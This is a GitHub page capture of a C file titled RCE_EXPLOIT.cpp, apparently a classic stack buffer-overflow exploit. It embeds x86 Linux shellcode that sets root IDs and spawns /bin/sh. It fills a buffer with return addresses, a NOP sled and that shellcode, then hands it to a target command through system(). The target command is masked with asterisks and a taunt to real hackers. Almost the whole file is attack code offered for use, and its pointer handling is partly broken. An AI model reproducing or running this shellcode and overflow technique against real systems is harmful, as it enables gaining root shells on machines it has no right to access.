-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathRCE_EXPLOIT.cpp
35 lines (27 loc) · 1.04 KB
/
RCE_EXPLOIT.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//#include <cstdint>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[])
{
char *command, *buffer;
unsigned int i, *ptr, ret, offset=270;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(*****************************); // ********* secret command , Figure Out Yourself if your real hacker
buffer = command + strlen(command); // Set BUFFER At The END
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int*) &i - offset; // Set Return Address FIX - uintptr_t
for(i=0; i < 160; i+=4) // Fill Buffer With Return Address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run The Exploit
free(command);
}